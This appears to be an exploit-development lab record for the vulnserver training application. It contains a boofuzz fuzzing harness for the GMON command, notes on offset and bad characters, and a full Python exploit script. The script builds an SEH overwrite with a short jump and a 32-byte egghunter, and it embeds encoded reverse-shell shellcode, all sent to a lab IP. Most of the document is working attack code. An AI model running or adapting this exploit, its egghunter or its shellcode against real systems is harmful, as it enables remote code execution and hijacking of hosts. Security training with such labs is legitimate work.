reference |
stephenbradshaw/vulnserver |
os name |
Microsoft Windows 7 Professional |
os version |
6.1.7601 Service Pack 1 Build 7601 |
system type |
x86-based PC |
target ip |
192.168.1.6 |
fuzz
fuzz_gmon.py
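"""boofuzz harness for the vulnserver GMON command.

Only the argument after "GMON " is mutated; the keyword and the separator are
pinned so every case still reaches the GMON handler.
"""
from boofuzz import Session, SocketConnection, Target, s_delim, s_get, s_initialize, s_string

host = "192.168.1.6"
port = 9999


def main(host=host, port=port):
    """Build the GMON request definition and run the fuzzing session.

    Args:
        host: target address (the lab box from the write-up by default).
        port: vulnserver's listening port.

    This blocks until boofuzz finishes or is interrupted; crashes are observed
    on the target side (debugger / process monitor), not reported here.
    """
    # SocketConnection is the legacy connection class; newer boofuzz releases
    # may only ship TCPSocketConnection -- swap it in if the import fails.
    session = Session(
        target=Target(connection=SocketConnection(host, port)),
        sleep_time=1,  # one second between cases so the service can recover
    )

    s_initialize("gmon")
    s_string("GMON", fuzzable=False)   # keyword stays fixed
    s_delim(" ", fuzzable=False)       # separator stays fixed
    s_string("data")                   # the only fuzzable field

    session.connect(s_get("gmon"))
    session.fuzz()


if __name__ == "__main__":
    main()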
bad characters: only \x00 was identified (the bad-character comparison itself is omitted)
offset: 3515 bytes after the `GMON /.:/` prefix, which is where exploit.py places the 4-byte short jump followed by the address (pattern-offset work omitted)
return address: 0x625010b4 in essfunc.dll, written little-endian as \xb4\x10\x50\x62 in exploit.py (module and gadget search omitted)
shellcode: the space available at the overwrite point is limited, so exploit.py places a short forward jump (\xeb\x06) at the offset, a 32-byte egghunter right after the address, and the reverse-shell shellcode — tagged w00tw00t — earlier in the buffer behind a 16-byte NOP sled; the hunter locates the tag in memory and executes the stage (egghunter and shellcode generation omitted)
exploit.py
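"""vulnserver GMON exploit: overwrite, short jump, egghunter, reverse shell.

Layout of the 5000-byte request built by build_payload():

    COMMAND | NOP x16 | EGG*2 + reverse shell | "A" filler | NSEH | SEH | egghunter | "C" filler
              <------------- OFFSET (3515) bytes ------------>

The 4-byte pair written at OFFSET -- a short forward jump followed by
0x625010b4 -- is the shape of an SEH record overwrite (nSEH, SEH); the
address is presumably a pop/pop/ret-style gadget in essfunc.dll, confirm in
the debugger. The jump skips the address and lands on the egghunter, which
scans memory for the doubled tag and runs the stage placed earlier in the
buffer. Only the null byte (0x00) was identified as a bad character.
"""
import os
import socket
import sys

host = "192.168.1.6"
port = 9999

COMMAND = b"GMON /.:/"         # OFFSET is counted after this prefix
OFFSET = 3515                  # attacker bytes before the nSEH/SEH pair
TOTAL_LEN = 5000               # size of every request sent
NOP_SLED = 16                  # NOPs in front of the stage
BAD_CHARS = b"\x00"            # only the null byte was found to be bad
EGG = b"w00t"                  # tag the hunter searches for (doubled before the stage)
NSEH = b"\xeb\x06\x41\x41"     # jmp short +6: over the 4-byte SEH address into the hunter
SEH = b"\xb4\x10\x50\x62"      # 0x625010b4 (essfunc.dll), little-endian

# 32-byte egghunter. The `push 2; pop eax; int 0x2e` core is the classic
# NT-syscall hunter written for 32-bit Windows (the target here is x86
# Windows 7); the tag it compares against sits right after the \xb8 (mov eax).
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
    b"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)

# Reverse shell stage, prefixed with the doubled egg so the hunter finds it.
# Bytes are reproduced exactly from the write-up (encoded to avoid 0x00).
shellcode = EGG * 2 + (
    b"\xbb\x06\x14\xd9\x61\xd9\xc8\xd9\x74\x24\xf4"
    b"\x5a\x29\xc9\xb1\x52\x83\xea\xfc\x31\x5a\x0e"
    b"\x03\x5c\x1a\x3b\x94\x9c\xca\x39\x57\x5c\x0b"
    b"\x5e\xd1\xb9\x3a\x5e\x85\xca\x6d\x6e\xcd\x9e"
    b"\x81\x05\x83\x0a\x11\x6b\x0c\x3d\x92\xc6\x6a"
    b"\x70\x23\x7a\x4e\x13\xa7\x81\x83\xf3\x96\x49"
    b"\xd6\xf2\xdf\xb4\x1b\xa6\x88\xb3\x8e\x56\xbc"
    b"\x8e\x12\xdd\x8e\x1f\x13\x02\x46\x21\x32\x95"
    b"\xdc\x78\x94\x14\x30\xf1\x9d\x0e\x55\x3c\x57"
    b"\xa5\xad\xca\x66\x6f\xfc\x33\xc4\x4e\x30\xc6"
    b"\x14\x97\xf7\x39\x63\xe1\x0b\xc7\x74\x36\x71"
    b"\x13\xf0\xac\xd1\xd0\xa2\x08\xe3\x35\x34\xdb"
    b"\xef\xf2\x32\x83\xf3\x05\x96\xb8\x08\x8d\x19"
    b"\x6e\x99\xd5\x3d\xaa\xc1\x8e\x5c\xeb\xaf\x61"
    b"\x60\xeb\x0f\xdd\xc4\x60\xbd\x0a\x75\x2b\xaa"
    b"\xff\xb4\xd3\x2a\x68\xce\xa0\x18\x37\x64\x2e"
    b"\x11\xb0\xa2\xa9\x56\xeb\x13\x25\xa9\x14\x64"
    b"\x6c\x6e\x40\x34\x06\x47\xe9\xdf\xd6\x68\x3c"
    b"\x4f\x86\xc6\xef\x30\x76\xa7\x5f\xd9\x9c\x28"
    b"\xbf\xf9\x9f\xe2\xa8\x90\x5a\x65\x17\xcc\x65"
    b"\x2c\xff\x0f\x65\xcf\x44\x86\x83\xa5\xaa\xcf"
    b"\x1c\x52\x52\x4a\xd6\xc3\x9b\x40\x93\xc4\x10"
    b"\x67\x64\x8a\xd0\x02\x76\x7b\x11\x59\x24\x2a"
    b"\x2e\x77\x40\xb0\xbd\x1c\x90\xbf\xdd\x8a\xc7"
    b"\xe8\x10\xc3\x8d\x04\x0a\x7d\xb3\xd4\xca\x46"
    b"\x77\x03\x2f\x48\x76\xc6\x0b\x6e\x68\x1e\x93"
    b"\x2a\xdc\xce\xc2\xe4\x8a\xa8\xbc\x46\x64\x63"
    b"\x12\x01\xe0\xf2\x58\x92\x76\xfb\xb4\x64\x96"
    b"\x4a\x61\x31\xa9\x63\xe5\xb5\xd2\x99\x95\x3a"
    b"\x09\x1a\xa5\x70\x13\x0b\x2e\xdd\xc6\x09\x33"
    b"\xde\x3d\x4d\x4a\x5d\xb7\x2e\xa9\x7d\xb2\x2b"
    b"\xf5\x39\x2f\x46\x66\xac\x4f\xf5\x87\xe5"
)


def build_payload(shellcode, egghunter, offset=OFFSET, total_len=TOTAL_LEN, nop_sled=NOP_SLED):
    """Assemble the complete GMON request.

    Args:
        shellcode: egg-tagged stage the hunter should find; must start with EGG * 2.
        egghunter: hunter stub placed directly after the SEH address.
        offset: distance from the start of the argument to the nSEH bytes.
        total_len: final request size; the tail is padded with "C".
        nop_sled: number of NOPs placed in front of the stage.

    Returns:
        The full request as bytes, COMMAND included.

    Raises:
        ValueError: the layout does not fit, the egg tags disagree, or a bad
            character appears anywhere in the request. The original script
            silently produced a broken buffer in these cases (a negative
            repeat count just yields an empty filler).
    """
    if not shellcode.startswith(EGG * 2):
        raise ValueError("shellcode must be prefixed with the doubled egg tag")
    if EGG not in egghunter:
        raise ValueError("egghunter does not search for the configured egg tag")

    filler = offset - nop_sled - len(shellcode)
    if filler < 0:
        raise ValueError(
            f"shellcode is {len(shellcode)} bytes, only {offset - nop_sled} fit before the overwrite"
        )

    body = b"".join([
        COMMAND,
        b"\x90" * nop_sled,
        shellcode,
        b"A" * filler,
        NSEH,
        SEH,
        egghunter,
    ])
    if len(body) > total_len:
        raise ValueError(f"payload is {len(body)} bytes, exceeds total_len={total_len}")
    payload = body + b"C" * (total_len - len(body))

    # Iterating bytes yields ints; `int in bytes` is a single-byte search.
    for bad in BAD_CHARS:
        if bad in payload:
            raise ValueError(f"bad character 0x{bad:02x} present in payload")
    return payload


def main(host=host, port=port, timeout=10):
    """Connect, read the banner, send the payload once.

    Args:
        host: target address.
        port: vulnserver's listening port.
        timeout: socket timeout in seconds; the service is not expected to
            answer once control is hijacked, so a timeout on the final read
            is tolerated rather than reported.
    """
    payload = build_payload(shellcode, egghunter)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)          # consume the welcome banner
        s.sendall(payload)    # sendall, not send: the buffer must go out whole
        try:
            s.recv(1024)      # the original waited for a reply; none is required
        except OSError:
            pass


if __name__ == "__main__":
    main()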